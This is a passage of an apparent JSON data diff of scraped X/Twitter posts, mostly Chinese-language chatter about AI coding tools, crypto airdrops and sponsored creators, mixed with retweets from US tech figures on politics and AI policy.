Srinivas", + "title": "A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.", + "url": "https://x.com/AravSrinivas/status/2049151268606894310", + "published_at": "2026-04-28T15:38:28+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣\n\n我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。", + "url": "https://x.com/dingyi/status/2049143565260042558", + "published_at": "2026-04-28T15:07:51+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。\n\n我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。\n\nClaude Code、Skills、OpenClaw,不都在向全自动化发展。\n如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。\n\n现在 AI Coding 的能力已经非常非常强了,你做出一个产品做出来后,完全可以让 AI 直接一键去复刻。\n\n用户想用什么产品,自己就一句话做出来了,那我们现在很多人去做的产品又有多少意义呢?\n\n甚至说现在很多产品其实不如一个 Skills,如果我能用一个 Skills 解决那为什么要用你的产品?", + "url": "https://x.com/gkxspace/status/2049136483106230523", + "published_at": "2026-04-28T14:39:43+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "50000🎉🎉", + "url": "https://x.com/CuiMao/status/2049128032661852434", + "published_at": "2026-04-28T14:06:08+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。", + "url": "https://x.com/CuiMao/status/2049127261409034535", + "published_at": "2026-04-28T14:03:04+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "图像类产品现在分两派:\n把单次生成做到极致,和把整个视觉工作流跑通。\n\nflowith 明显是后者,还顺手把视频给 seedance 出来了。\n\n关键是底层就是 image2,而且不止这一个模型。\n\n不管底层怎么换,上层工作流都很稳。\n单点极致 + 工作流闭环,两派合一。\n\n对我这种普通用户非常有价值。", + "url": "https://x.com/frxiaobei/status/2049121762009632774", + "published_at": "2026-04-28T13:41:13+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Flowith出 GPT image 的生图Agent,真快呀\n\n我赶紧试试,看看如何!!", + "url": "https://x.com/lxfater/status/2049119209502670864", + "published_at": "2026-04-28T13:31:04+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Test of Time LLM from some legends...pretty fun!", + "url": "https://x.com/soumithchintala/status/2049117783447785523", + "published_at": "2026-04-28T13:25:24+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧?\n\n目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S", + "url": "https://x.com/dingyi/status/2049096050158551248", + "published_at": "2026-04-28T11:59:03+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 🧵 THREAD\n\n1/ Online age verification is the hill to die on.\n\nNot a fight you can sit out. Not a battle you can skip. Not a policy you can afford to ignore while you focus on something else.\n\nThis is it. This is the line. This is the infrastructure that enables every other piece of the digital control grid.\n\nIf we lose this fight, we lose everything.", + "url": "https://x.com/paulg/status/2049088498163216560", + "published_at": "2026-04-28T11:29:02+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "这个 Codex 教程很不错,新手值得一看。\n\n作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。\n\n5 个有用的技巧:\n\n①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。\n\n②插件是别人给你的能力,skills是你自己造的能力。遇到重复流程,用 /skill creator 让 AI 帮你封装成可复用技能。\n\n③自动化只需要一句话,如:\"把这个任务每周五下午4点跑一次\"。日历周报、YouTube 数据分析、Twitter 发帖,全部自动。\n\n④Codex 的设计能力是短板。解法是在 Codex 终端里直接跑 Claude Code,让它处理视觉密集型任务。Codex 调度,Claude 出活,各取所长。\n\n⑤Steer 功能让你在 AI 工作途中实时注入修正指令,不用等它跑完再改。Fork 功能让你从一个已有大量上下文的聊天分叉出新任务,不用重复描述背景。\n\n⑥从 Anthropic 的 http://claude.ai/design 里提取设计工具的工作逻辑,直接移植到 Codex 变成自己的技能。跨平台能力迁移。\n\nhttps://x.com/Saccc_c/status/2048629684792098966/video/1", + "url": "https://x.com/gkxspace/status/2049083226463797284", + "published_at": "2026-04-28T11:08:05+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下:\n\n1. Obsidian:用来做内容存档、搭建个人知识库\n2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商\n3. Codex :最近更新很频繁,体验也越来越好,而且不封号\n4. Ghostty:一个非常丝滑的终端,推荐~\n5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽\n6. V2rayN:更加必不可少了,大家都懂", + "url": "https://x.com/gkxspace/status/2049072666385006919", + "published_at": "2026-04-28T10:26:08+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "央视报道了 “渔猎齐哥” Up主,真牛逼啊。\n监督环境保护,吾辈义不容辞!", + "url": "https://x.com/0xAA_Science/status/2049072268165497033", + "published_at": "2026-04-28T10:24:33+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。", + "url": "https://x.com/chuxiaeth/status/2049048148660965739", + "published_at": "2026-04-28T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。\n#TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。", + "url": "https://x.com/chuxiaeth/status/2049045566857064461", + "published_at": "2026-04-28T08:38:27+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误", + "url": "https://x.com/chuxiaeth/status/2049043685094907944", + "published_at": "2026-04-28T08:30:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/bozhou_ai/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/chuxiaeth/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的", + "url": "https://x.com/bozhou_ai/status/2049033808629129504", + "published_at": "2026-04-28T07:51:43+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说得太对了👍,牛逼", + "url": "https://x.com/lxfater/status/2049026986442707117", + "published_at": "2026-04-28T07:24:37+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "x.com/i/article/204902020458…", + "url": "https://x.com/bozhou_ai/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "x.com/i/article/204837140806…", + "url": "https://x.com/lxfater/status/2049019768456241273", + "published_at": "2026-04-28T06:55:56+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 来源:\n\n[1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17\n[2] https://thenextweb.com/news/openai-is-in-talks-to-buy-fusion-energy-from-helion\n[3] https://www.cnbc.com/2026/02/25/thrive-capital-openai-joshua-kushner.html\n[4] https://slguardian.org/conflict-of-interest-storm-engulfs-openai-as-sam-altmans-private-deals-face-scrutiny/\n[5] https://techcentral.co.za/greg-brockmans-diary-takes-centre-stage-in-musk-vs-openai/280684/\n[6] https://x.com/elonmusk/status/2048801964457140540(Musk 原推:「Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style」)", + "url": "https://x.com/lxfater/status/2049009528595685705", + "published_at": "2026-04-28T06:15:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法\n\n2015 年,OpenAI 打着非营利的旗号成立\n顶级研究员冲着使命感来,不要钱只要理想\nMusk 看到了,砸了 3800 万进去\n监管也没把它当商业公司盯\n\n连 Musk 这种人都信了\n\n但 CEO 在想另一件事\n\nAltman 从 2014 年开始,在核聚变公司 Helion 买了股\n2021 年一口气砸进去 3.75 亿美元,这是他个人最大的一笔押注 [1]\n\n然后他提议,让 OpenAI 向 Helion 投 5 亿美元\n这 5 亿进去,Helion 估值直接涨 6 倍,他自己的股份跟着涨 [1]\n\nOpenAI 内部的人看出问题了\n员工觉得 Helion 的技术根本没到那个阶段,而且 CEO 这么做,明摆着是用公司的钱给自己的投资抬价\n董事会拒绝了 [1]\n\n看起来,这件事到这里结束了\n\n但 Altman 还有一招\n\n他让 OpenAI 跟 Helion 签了一份购电协议\n2035 年前买 Helion 的 50 吉瓦电力\n就是说,OpenAI 承诺未来要用 Helion 的电\n那些电,现在还没发出来 [2]\n\nHelion 拿着这份协议去融资,融到了 2.5 亿美元,估值 150 亿\n领投的 Thrive Capital 跟 Altman 关系很深,同时也是 OpenAI 的投资人,往里投了超过 10 亿美元 [3]\n\n股权投资被拒了\n他换了个形式,把同样的事做完了\n\nMusk 把这套操作叫做 Y Combinator 风格 [6]\n就是 YC 那套圈内玩法:互相投资、互相背书,写进合同结构里,外人看全是正常生意\n\nAltman 就是从 YC 出来的\n\nMusk 说,Altman 用这套方式给自己安排了几十笔交易\n(这是 Musk 的指控,庭审还在进行,法庭没有裁定)[6]\n\n但 2023 年 11 月,董事会把 Altman 踢走的时候说的是:\n\n他投了什么公司,我们根本不知道 [4]\n\n不是没想查,是这个结构本来就看不出来\n非营利机构没有上市公司那套强制披露,CEO 替 OpenAI 谈的每笔交易,到底是为公司还是为自己,没人能判断\n\n今天,Musk 的庭审正式开始\nBrockman 的日记、Helion 这条线、整套结构,第一次摆到台面上 [5]\n\nMusk 能不能赢不好说\n\n但那套结构,还在别的地方跑着", + "url": "https://x.com/lxfater/status/2049009402372313341", + "published_at": "2026-04-28T06:14:44+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "青椒肉丝饭 + 老盐百香果 6u", + "url": "https://x.com/0xAA_Science/status/2049000780519321906", + "published_at": "2026-04-28T05:40:29+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。", + "url": "https://x.com/frxiaobei/status/2048991998275965022", + "published_at": "2026-04-28T05:05:35+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "快连被墙干服了,关停了中国大陆的服务。\n\n我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。\n有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。", + "url": "https://x.com/0xAA_Science/status/2048973617854328890", + "published_at": "2026-04-28T03:52:33+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc\n\nIn just one year, it has been almost completely dismantled\n\nOf 1500 scientists, only 124 remain\n\nhttps://www.nytimes.com/2026/04/27/climate/epa-science-trump-cuts.html?unlocked_article_code=1.eVA.yCwJ.TYSUUslTTFoa&smid=tw-share", + "url": "https://x.com/ylecun/status/2048931628995510596", + "published_at": "2026-04-28T01:05:42+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多", + "url": "https://x.com/bozhou_ai/status/2048921844175212590", + "published_at": "2026-04-28T00:26:49+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: “Calling Trump a fascist incites political violence”\n\nHere’s a compilation of Trump calling his opponents fascists", + "url": "https://x.com/ylecun/status/2048879552022130882", + "published_at": "2026-04-27T21:38:46+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: New work with @AlecRad and @DavidDuvenaud:\n\nHave you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. \n\nVintage models should help us to understand how LMs generalize (e.g., can we teach talkie to code?). Thread:", + "url": "https://x.com/karpathy/status/2048878495539843211", + "published_at": "2026-04-27T21:34:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: He is right", + "url": "https://x.com/ylecun/status/2048871429681148028", + "published_at": "2026-04-27T21:06:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song 2 (remix much better then original)\n\nhttps://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048865167233200586", + "published_at": "2026-04-27T20:41:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song\nhttps://www.youtube.com/watch?v=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048863662396658146", + "published_at": "2026-04-27T20:35:37+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.", + "url": "https://x.com/DavidSacks/status/2048821257534111863", + "published_at": "2026-04-27T17:47:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: x.com/a16z/status/1985413352…", + "url": "https://x.com/DavidSacks/status/2048813533136060459", + "published_at": "2026-04-27T17:16:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian future they claim to oppose. From last year:\n https://x.com/a16z/status/1985413352349413542/video/1?s=48", + "url": "https://x.com/DavidSacks/status/2048813311668486300", + "published_at": "2026-04-27T17:15:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.", + "url": "https://x.com/DavidSacks/status/2048811495224390105", + "published_at": "2026-04-27T17:08:20+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: A completely local agent that lives right inside your browser.\n\nPowered by Gemma 4 E2B and WebGPU, it uses native tool calling to:\n\n🔍 Search browsing history\n📄 Read and summarize pages\n🔗 Manage tabs\n\n100% local. No servers needed!", + "url": "https://x.com/frxiaobei/status/2048805789788413984", + "published_at": "2026-04-27T16:45:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Amazing", + "url": "https://x.com/frxiaobei/status/2048805385537306677", + "published_at": "2026-04-27T16:44:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil", + "url": "https://x.com/eladgil/status/2048803386938495412", + "published_at": "2026-04-27T16:36:07+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。\n\n但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。\n\n像极了刚走向社会的二愣子。", + "url": "https://x.com/frxiaobei/status/2048802517237350599", + "published_at": "2026-04-27T16:32:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。\n😤\n虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。", + "url": "https://x.com/frxiaobei/status/2048800504206282887", + "published_at": "2026-04-27T16:24:39+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions on what to build and build it directly, they can execute incredibly quickly.\n\nI’ve seen engineers successfully expand their roles to including making product decisions, and PMs expand their roles to building software. The tech industry has more engineers than PMs, but both are promising paths. If you are an engineer, you’ll find it useful to learn some product management skills, and if you’re a PM, please learn to build!\n\nLooking beyond the product-management bottleneck, I also see bottlenecks in design, marketing, legal compliance, and much more. When we speed up coding 10x or 100x, everything else becomes slow in comparison. For example, some of my teams have built great features so quickly that the marketing organization was left scrambling to figure out how to communicate them to users — a marketing bottleneck. Or when a team can build software in a day that the legal department needs a week to review, that’s a legal compliance bottleneck. In this way, agentic coding isn’t just changing the workflow of software engineering, it’s also changing all the teams around it.\n\nWhen smaller, AI-enabled teams can get more done, generalists excel. Traditional companies need to pull together people from many specialties — engineering, product management, design, marketing, legal, etc. — to execute projects and create value. This has resulted in large teams of specialists who work together. But if a team of 2 persons is to get work done that require 5 different specialities, then some of those individuals must play roles outside a single speciality. In some small teams, individuals do have deep specializations. For example, one might be a great engineer and another a great PM. But they also understand the other key functions needed to move a project forward, and can jump into thinking through other kinds of problems as needed. Of course, proficiency with AI tools is a big help, since it helps us to think through problems that involve different roles.\n\nEven in a two-person team, to move fast, communication bottlenecks also must be minimized. This is why I value teams that work in the same location. Remote teams can perform well too, but the highest speed is achieved by having everyone in the room, able to communicate instantaneously to solve problems.\n\nThis post focuses on AI-native teams with around 2-10 persons, but not everything can be done by a small team. I'll address the coordination of larger teams in the future.\n\nI realize these shifts to job roles are tough to navigate for many people. At the same time, I am encouraged that individuals and small teams who are willing to learn the relevant skills are now able to get far more done than was possible before. This is the golden age of learning and building!\n\n[Original text: https://www.deeplearning.ai/the-batch/issue-349/ ]", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "published_at": "2026-04-27T15:58:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 years. Supporters of this action live in a fantasy dystopia about how science operates.", + "url": "https://x.com/ylecun/status/2048779086168838610", + "published_at": "2026-04-27T14:59:33+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "最近想玩链游的可以看看 @RealGoOfficial 这个游戏\n\n他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。\n\n他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如 Doge、Floki、Toshi 和 WIF 等等,之前和 @xhunt_ai 也有过合作。\n\n大概今年 Q2 会 TGE,有时间可以玩一玩,可以参加一下他们的忠诚度计划,玩游戏或交互都可以撸积分和代币。", + "url": "https://x.com/wolfyxbt/status/2048764088193569049", + "published_at": "2026-04-27T13:59:57+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the net error rate in counting presidential votes was 0.007%. The median shift in any county's vote count was zero.", + "url": "https://x.com/ylecun/status/2048740712556933170", + "published_at": "2026-04-27T12:27:04+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Image", + "url": "https://x.com/Stv_Lynn/status/2048713165232644251", + "published_at": "2026-04-27T10:37:36+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "Meta 对 Manus 的收购被中国发改委驳回。\n看来以后要么一开始就出海,要么就不出海。", + "url": "https://x.com/0xAA_Science/status/2048685380304871774", + "published_at": "2026-04-27T08:47:12+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": 